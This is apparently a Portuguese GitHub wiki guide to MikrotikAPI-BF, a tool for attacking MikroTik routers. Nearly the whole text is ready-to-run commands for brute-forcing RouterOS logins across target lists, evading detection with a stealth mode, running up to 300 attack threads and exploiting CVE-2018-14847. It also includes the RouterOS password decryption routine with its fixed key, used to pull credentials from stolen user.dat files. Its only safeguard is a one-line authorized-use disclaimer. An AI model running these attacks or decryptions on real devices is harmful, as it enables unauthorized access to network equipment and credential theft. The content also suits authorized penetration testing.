Complete Usage Guide pt BR - mrhenrike/MikrotikAPI-BF GitHub Wiki

Guia Completo de Uso — MikrotikAPI-BF v3.5.x (pt-BR)

Apenas para testes de segurança autorizados. Todos os exemplos requerem permissão explícita e por escrito do proprietário do sistema alvo.


Início Rápido

git clone https://github.com/mrhenrike/MikrotikAPI-BF.git
cd MikrotikAPI-BF
pip install -r requirements.txt
python mikrotikapi-bf.py --help

1. Força Bruta Básica

Alvo único, usuário único, lista de senhas

python mikrotikapi-bf.py -t 192.168.1.1 -U admin -d wordlists/passwords.lst

Lista de usuários + lista de senhas

python mikrotikapi-bf.py -t 192.168.1.1 -u usuarios.lst -p senhas.lst

Arquivo combo (usuario:senha)

python mikrotikapi-bf.py -t 192.168.1.1 -d combos.lst

Porta API customizada

python mikrotikapi-bf.py -t 192.168.1.1 --api-port 1337 -d senhas.lst

2. Multi-Alvo (v3.5.0+)

Arquivo alvos.txt (um IP por linha, # para comentários):

python mikrotikapi-bf.py -T alvos.txt -d senhas.lst -U admin
python mikrotikapi-bf.py --target-list alvos.txt -d combos.lst --threads 5

3. Validação de Serviços Pós-Login

# Valida FTP, SSH, Telnet após login bem-sucedido
python mikrotikapi-bf.py -t 192.168.1.1 -d senhas.lst --validate ftp,ssh,telnet

# Portas customizadas
python mikrotikapi-bf.py -t 192.168.1.1 -d senhas.lst --validate ftp=2121,ssh=2222

4. Varredura de CVEs / Vulnerabilidades

# Varrer CVEs aplicáveis à versão RouterOS detectada
python mikrotikapi-bf.py -t 192.168.1.1 --scan-cve -U admin -P senha

# Varrer TODOS os CVEs (independente da versão)
python mikrotikapi-bf.py -t 192.168.1.1 --scan-cve --all-cves -U admin -P senha

# Exportar resultados para JSON
python mikrotikapi-bf.py -t 192.168.1.1 --scan-cve --all-cves \
  -U admin -P senha --export json --export-dir ./resultados

5. MAC-Server / Descoberta Layer-2 (v3.3.0+)

Requer estar no mesmo segmento Layer-2 (VLAN/switch) que os alvos.

# Descobrir dispositivos Mikrotik no segmento L2 local
python mikrotikapi-bf.py --mac-discover

# Descobrir + força bruta via MAC-Telnet
python mikrotikapi-bf.py --mac-discover --mac-brute -d senhas.lst

# CVE-2018-14847 em todos os dispositivos descobertos
python mikrotikapi-bf.py --mac-scan-cve

6. Decodificadores Offline (v3.5.0+)

Decodificar user.dat (obtido via CVE-2018-14847)

python mikrotikapi-bf.py --decode-userdat user.dat
python mikrotikapi-bf.py --decode-userdat user.dat --decode-useridx user.idx

Algoritmo de descriptografia da senha RouterOS:

chave = MD5(usuario + "283i4jfkai3389")  # 16 bytes
senha_em_claro = XOR(senha_criptografada, chave * 16)

Decodificar arquivo .backup

python mikrotikapi-bf.py --decode-backup router.backup
# Extrai todos os .dat/.idx e decodifica credenciais automaticamente

Analisar pacote NPK (CVE-2019-3977)

python mikrotikapi-bf.py --analyze-npk routeros.npk

Listar seções do supout.rif

python mikrotikapi-bf.py --decode-supout supout.rif

7. Modo Furtivo (Stealth)

python mikrotikapi-bf.py -t 192.168.1.1 -d senhas.lst --stealth
python mikrotikapi-bf.py -t 192.168.1.1 -d senhas.lst -s 10  # 10s entre tentativas

8. Threads

python mikrotikapi-bf.py -t 192.168.1.1 -d senhas.lst --threads 8  # máx: 15

9. Retomada de Sessão

# Iniciar com sessão
python mikrotikapi-bf.py -t 192.168.1.1 -d lista_grande.lst

# Retomar se interrompido
python mikrotikapi-bf.py -t 192.168.1.1 -d lista_grande.lst --resume

# Listar sessões salvas
python mikrotikapi-bf.py --list-sessions

10. Exportação de Resultados

python mikrotikapi-bf.py -t 192.168.1.1 -d senhas.lst --export json
python mikrotikapi-bf.py -t 192.168.1.1 -d senhas.lst --export-all --export-dir ./relatorio

11. REPL Interativo

python mikrotikapi-bf.py --interactive

# Dentro do REPL:
# mikrotik-bf> scan 192.168.1.0/24
# mikrotik-bf> fingerprint 192.168.1.1
# mikrotik-bf> attack 192.168.1.1 -w wordlists/combos.lst
# mikrotik-bf> exploits 192.168.1.1
# mikrotik-bf> results
# mikrotik-bf> export json
# mikrotik-bf> exit

12. Fluxo Completo de Pentest

# 1. Fingerprint
python mikrotikapi-bf.py -t 192.168.1.1 --fingerprint

# 2. Varredura CVE sem credenciais
python mikrotikapi-bf.py -t 192.168.1.1 --scan-cve

# 3. Força bruta furtiva
python mikrotikapi-bf.py -t 192.168.1.1 \
  -u usuarios.lst -d senhas.lst \
  --stealth --threads 3 --progress

# 4. Assessment completo com credenciais encontradas
python mikrotikapi-bf.py -t 192.168.1.1 --scan-cve --all-cves \
  -U admin -P "senha_encontrada" \
  --validate ftp,ssh,telnet \
  --export-all --export-dir ./relatorio/

# 5. Ataque MAC-Server (se no mesmo L2)
python mikrotikapi-bf.py --mac-discover --mac-brute -d combos.lst

# 6. Decodificar credenciais extraídas
python mikrotikapi-bf.py --decode-userdat /tmp/user.dat --decode-useridx /tmp/user.idx

18. Auto-instalação NSE

`ash

Instalar scripts NSE no Nmap automaticamente

mikrotikapi-install-nse

Ou via flag CLI

mikrotikapi-bf --install-nse

Sobrescrever diretório do Nmap

NMAP_SCRIPTS_DIR=/caminho/custom mikrotikapi-install-nse `

19. Modo Alto Número de Threads (até 300)

`ash

AVISO: requer --high-threads para N > 15

python mikrotikapi-bf.py -t 192.168.1.1 -d senhas.lst --threads 100 --high-threads

Máximo (300 threads - use com cautela)

python mikrotikapi-bf.py -T alvos.lst -d combos.lst --threads 300 --high-threads `